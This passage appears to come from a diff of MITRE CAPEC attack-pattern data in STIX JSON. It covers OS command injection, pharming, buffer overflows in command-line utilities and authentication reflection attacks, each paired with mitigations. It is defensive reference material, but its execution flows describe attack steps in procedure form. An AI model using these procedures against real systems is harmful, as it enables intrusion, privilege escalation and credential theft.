    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

  4. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application

  2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)

Exploit

  1. Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.

  2. Techniques
    The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User controllable input used as part of commands to the underlying operating system." + ], + "x_capec_skills_required": { + "High": "The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", + "id": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9de3eaad-1ea7-4658-a9af-71b7e6a839d3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Filter all incoming data to escape or remove characters or strings that 
can be potentially misinterpreted as operating system or shell commands", + "id": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--318ffd75-623d-4e4e-82ef-fe62b9837bef", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All application processes should be run with the minimal privileges required. 
Also, processes must shed privileges as soon as they no longer require them.", + "id": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22a2ec23-338d-4ecf-ac2b-3692d8dd907d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. 
Pharming does not require script injection or clicking on malicious links for the attack to succeed.", + "external_references": [ + { + "external_id": "CAPEC-89", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + } + ], + "id": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pharming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Exploit

  1. Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.

  2. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website

  3. When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.

  4. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \"farm\" sensitive information such as credentials or account numbers.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Vulnerable DNS software or improperly protected hosts file or router that can be poisoned", + "A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All sensitive information must be handled over a secure connection.", + "id": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", + "id": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7002b548-99da-4471-becf-a12babe27aaa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", + "id": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": 
"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--847a5a83-ab42-40dc-b158-f71498aa91cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.", + "external_references": [ + { + "external_id": "CAPEC-9", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/9.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + 
}, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in Local Command-Line Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target system: The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means.

  2. Find injection vector: The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities.

Experiment

  1. Craft overflow command: Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes a command-line utility to the user.", + "The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.", + "id": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13bbe611-6800-4010-ae1b-33b6e818ee74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--206efa47-ea89-4b09-8d45-dc1df1ea72bc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8ab5adf-0b4b-45fd-b053-fad9c99c3106", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb0be5c1-63ea-4146-aec0-793d0f1c8c28", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", + "id": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2dd4206b-b25d-4696-8b9c-de2639f1bb97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not unnecessarily expose services.", + "id": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811c10ed-2d65-4f4d-87e7-31665c01f9bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + 
"attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The server must initiate the handshake by issuing the challenge. 
This ensures that the client has to respond before the exchange can move any further", + "id": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4612e9dd-418b-4c42-9d4f-2534fdc5e72c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. 
Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7753fcf-92fd-495a-8a64-8a0cb4a47728", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", + "id": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6663135-b6d0-4fb2-adb1-200f7f1e01a7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
